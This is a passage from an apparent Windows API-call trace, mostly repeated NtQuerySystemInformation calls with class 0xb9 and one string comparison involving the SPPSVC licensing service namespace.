SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0280.400] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.400] 